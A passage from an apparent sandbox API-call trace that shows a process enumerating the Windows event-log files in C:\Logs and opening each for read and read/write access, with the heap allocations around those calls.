lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.549] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.549] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0086.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0086.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.550] AreFileApisANSI () returned 1 [0086.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0086.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.550] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0086.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.551] AreFileApisANSI () returned 1 [0086.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0086.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 57 [0086.551] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.551] GetFileType (hFile=0x348) returned 0x1 [0086.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.551] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.551] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.551] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.551] CloseHandle (hObject=0x348) returned 1 [0086.552] AreFileApisANSI () returned 1 [0086.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0086.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 57 [0086.552] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.552] GetFileType (hFile=0x348) returned 0x1 [0086.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.552] CloseHandle (hObject=0x348) returned 1 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.553] AreFileApisANSI () returned 1 [0086.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0086.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 57 [0086.553] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0086.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.553] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f90 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f90 | out: hHeap=0x20000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe6) returned 0x4ebc8 [0086.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0086.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x4ebc8 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0086.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0086.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.554] AreFileApisANSI () returned 1 [0086.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpUsedDefaultChar=0x0) returned 87 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0086.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.555] AreFileApisANSI () returned 1 [0086.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0086.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81860 [0086.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81860, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 87 [0086.555] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.555] GetFileType (hFile=0x348) returned 0x1 [0086.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81860 | out: hHeap=0x20000) returned 1 [0086.555] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.555] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.555] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.556] CloseHandle (hObject=0x348) returned 1 [0086.556] AreFileApisANSI () returned 1 [0086.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0086.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81078 [0086.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81078, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 87 [0086.556] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.556] GetFileType (hFile=0x348) returned 0x1 [0086.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0086.556] CloseHandle (hObject=0x348) returned 1 [0086.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x4ebc8 [0086.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x5a6b8 [0086.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x80a30 [0086.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0086.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0086.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0086.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cf80 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0086.557] AreFileApisANSI () returned 1 [0086.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87 [0086.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xae) returned 0x81580 [0086.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x81580, cchWideChar=87 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx") returned 87 [0086.557] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000)) returned 1 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81580 | out: hHeap=0x20000) returned 1 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0086.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.557] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, 